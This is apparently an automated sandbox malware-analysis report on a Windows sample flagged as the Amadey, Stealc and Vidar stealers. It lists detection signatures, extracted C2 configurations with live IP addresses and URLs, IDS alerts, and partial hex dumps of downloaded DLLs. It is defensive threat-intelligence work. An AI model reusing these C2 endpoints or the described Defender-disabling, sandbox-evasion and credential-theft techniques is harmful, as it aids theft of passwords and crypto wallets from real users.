Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1554385
MD5: 5a2241ae692a1a1563afd21574dcf238
SHA1: d0916dbe85860c53b54338b35912e11698d5408e
SHA256: f881547a0def14f2d0721c040a32d2bf1f22a0aaf7a5c0b4e3d83bb41b2037ec
Tags: exeuser-Bitsight
Infos:

Detection

Amadey, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Drops PE files to the document folder of the user
Drops PE files to the user root directory
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies windows update settings
Monitors registry run keys for changes
PE file contains section with special chars
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the user directory
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: http://185.215.113.206/68b591d6548ec281/mozglue.dllH Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpeT Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpM Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/freebl3.dllz Avira URL Cloud: Label: malware
Source: http://185.215.113.16/mine/random.exex Avira URL Cloud: Label: phishing
Source: http://185.215.113.206/c4becf79229cb002.php; Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/freebl3.dllV Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/msvcp140.dllL Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpV Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php/u Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php_ Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpg Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpi Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000017.00000002.2672523079.0000000000C31000.00000040.00000001.01000000.0000000E.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 80b5f835af.exe.3004.29.memstrmin Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAE6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6CAE6C80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC3A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 0_2_6CC3A9A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC344C0 PK11_PubEncrypt, 0_2_6CC344C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC34440 PK11_PrivDecrypt, 0_2_6CC34440
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC04420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free, 0_2_6CC04420
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC825B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt, 0_2_6CC825B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC1E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free, 0_2_6CC1E6E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC3A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext, 0_2_6CC3A650
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC18670 PK11_ExportEncryptedPrivKeyInfo, 0_2_6CC18670
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49779 version: TLS 1.0
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49729 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49766 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49782 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:51580 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:62324 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:62396 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:62412 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:62428 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:51899 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2655139395.000000006CB4D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2655673154.000000006CD0F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2655673154.000000006CD0F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: e8cb2646d2.exe, 0000001E.00000002.3105997108.0000000000DB2000.00000040.00000001.01000000.00000010.sdmp, e8cb2646d2.exe, 0000001E.00000003.2971584224.0000000004990000.00000004.00001000.00020000.00000000.sdmp, e8cb2646d2.exe, 00000020.00000002.3172278060.0000000000DB2000.00000040.00000001.01000000.00000010.sdmp, e8cb2646d2.exe, 00000020.00000003.3131912525.00000000050E0000.00000004.00001000.00020000.00000000.sdmp, e8cb2646d2.exe, 00000021.00000003.3267299205.00000000053D0000.00000004.00001000.00020000.00000000.sdmp, e8cb2646d2.exe, 00000021.00000002.3307614636.0000000000DB2000.00000040.00000001.01000000.00000010.sdmp
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2655139395.000000006CB4D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: chrome.exe Memory has grown: Private usage: 12MB later: 31MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49709 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.6:49709 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.6:49709
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.6:49709 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.6:49709
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.6:49709 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:62374 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.6:62383
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:62393 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:62391 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:62394 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:62399 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:62405 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:62401 -> 185.215.113.206:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor IPs: 185.215.113.43
Detected non-DNS traffic on DNS port
Source: global traffic TCP traffic: 192.168.2.6:51880 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.6:51511 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.6:62181 -> 162.159.36.2:53
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Nov 2024 12:35:09 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Nov 2024 12:35:32 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Nov 2024 12:35:35 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 